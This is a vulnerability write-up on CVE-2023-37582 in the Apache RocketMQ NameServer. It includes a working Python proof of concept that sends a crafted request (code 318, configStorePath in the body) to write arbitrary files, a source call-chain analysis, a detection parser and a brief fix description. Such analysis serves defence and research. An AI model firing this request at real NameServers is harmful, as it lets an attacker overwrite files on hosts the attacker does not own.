Vulnerability Profile
Apache RocketMQ is a distributed message middleware offering low latency, high concurrency, high availability and high reliability. CVE-2023-37582 exists because the fix for CVE-2023-33246 was incomplete: when the Apache RocketMQ NameServer is reachable without authentication, an attacker can construct a malicious request and execute commands as the system user running RocketMQ.
Affected versions
Apache RocketMQ <= 5.1.1
Apache RocketMQ <= 4.9.6
Environment build
Refer to the environment setup in the Apache RocketMQ Remote Code Execution Vulnerability CVE-2023-33246 write-up.
For ease of debugging, we again build the RocketMQ services on Linux and start them from source.
Two services need to be running:
org.apache.rocketmq.namesrv.NamesrvStartup
org.apache.rocketmq.broker.BrokerStartup
Start NamesrvStartup first, then BrokerStartup; the environment variable ROCKETMQ_HOME must be configured:
ROCKETMQ_HOME=/home/ubuntu/Desktop/rocketmq-rocketmq-all-5.1.0
Vulnerability reproduction
Run the following Python script:
import socket
import binascii

client = socket.socket()
# NameServer address (replace with the one in your lab)
client.connect(('192.168.222.130', 9876))

# Frame layout: 4-byte total length, 4-byte header length (top byte = serialize type, 0 for JSON), header JSON, body
json = '{"code":318,"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
body = 'configStorePath=/tmp/test.txt\nproductEnvName=123\\ntest'.encode('utf-8')

json_lens = int(len(binascii.hexlify(json).decode('utf-8')) / 2)  # one byte is two hex digits
head1 = '00000000' + str(hex(json_lens))[2:]  # hex(n) gives e.g. 0x1243434; strip the leading 0x
all_lens = int(4 + len(binascii.hexlify(body).decode('utf-8')) / 2 + json_lens)  # total = header-length word + header + body
head2 = '00000000' + str(hex(all_lens))[2:]
data = head2[-8:] + head1[-8:] + binascii.hexlify(json).decode('utf-8') + binascii.hexlify(body).decode('utf-8')

# send the frame and read the reply
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)
The specified string "test" is successfully written into test.txt under the /tmp directory.
Vulnerability Analysis
org/apache/rocketmq/remoting/protocol/RequestCode.java
The code field selects which handler is invoked; here 318, the update-configuration operation, is called.
src/main/java/org/apache/rocketmq/remoting/protocol/RequestCode.java
The handler that corresponds to the code is called to process the request.
src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java
src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java#updateConfig
src/main/java/org/apache/rocketmq/remoting/Configuration.java#update
It first checks whether the attribute is one that is allowed to be modified.
src/main/java/org/apache/rocketmq/remoting/Configuration.java#persist
src/main/java/org/apache/rocketmq/remoting/Configuration.java#getStorePath
getStorePath is called to obtain the file path; the value obtained here is the value of configStorePath.
src/main/java/org/apache/rocketmq/common/MixAll.java#string2File
src/main/java/org/apache/rocketmq/common/MixAll.java#string2FileNotSafe
src/main/java/org/apache/rocketmq/common/utils/IOTinyUtils.java#writeStringToFile
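The call chain above means a single UPDATE_NAMESRV_CONFIG request (code 318) whose body carries configStorePath is enough to redirect the persisted configuration to an arbitrary file. As an added example (not code from the page or from the RocketMQ project), the following parser decodes a remoting frame using the layout the PoC encodes and flags that pattern, which is the check a detection rule or a proxy in front of the NameServer would apply; the sample frame is constructed here, not captured traffic, and the constant names are assumptions.

```python
import json
import struct

UPDATE_NAMESRV_CONFIG = 318  # RequestCode value sent by the request discussed above
JSON_SERIALIZE_TYPE = 0      # top byte of the header-length word for JSON headers

def build_frame(header: dict, body: bytes) -> bytes:
    """Encode a RocketMQ remoting frame: [total len][type<<24 | header len][header][body]."""
    header_bytes = json.dumps(header, separators=(",", ":")).encode("utf-8")
    header_word = (JSON_SERIALIZE_TYPE << 24) | len(header_bytes)
    total = 4 + len(header_bytes) + len(body)  # total excludes its own 4-byte field
    return struct.pack(">II", total, header_word) + header_bytes + body

def parse_frame(data: bytes) -> tuple:
    """Decode one frame into (header dict, body bytes); reject inconsistent lengths."""
    if len(data) < 8:
        raise ValueError("frame too short")
    total, header_word = struct.unpack(">II", data[:8])
    header_len = header_word & 0x00FFFFFF  # low 24 bits are the header length
    if total + 4 != len(data) or header_len > total - 4:
        raise ValueError("length fields inconsistent with frame size")
    header = json.loads(data[8:8 + header_len].decode("utf-8"))
    return header, data[8 + header_len:4 + total]

def parse_properties(body: bytes) -> dict:
    """Parse the key=value lines the NameServer loads as a Properties body."""
    props = {}
    for line in body.decode("utf-8", errors="replace").splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            props[key.strip()] = value.strip()
    return props

def inspect_frame(data: bytes) -> list:
    """Return findings: code 318 plus a configStorePath override is the CVE-2023-37582 pattern."""
    header, body = parse_frame(data)
    if header.get("code") != UPDATE_NAMESRV_CONFIG:
        return []
    findings = ["UPDATE_NAMESRV_CONFIG request (code 318) seen"]
    props = parse_properties(body)
    if "configStorePath" in props:
        findings.append(f"configStorePath overridden to {props['configStorePath']!r}")
    return findings

# Constructed sample mirroring the request shape shown above (not captured traffic).
SAMPLE_FRAME = build_frame(
    {"code": 318, "flag": 0, "language": "JAVA", "opaque": 1,
     "serializeTypeCurrentRPC": "JSON", "version": 433},
    b"configStorePath=/tmp/example.txt\nproductEnvName=demo",
)
```

Frames that carry code 318 without configStorePath still produce a finding, because legitimate administrative use of that code is rare enough on an exposed NameServer to be worth reviewing.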
Bug fix
The fix changes the update handling so that the configuration store path can no longer be modified through this request parameter.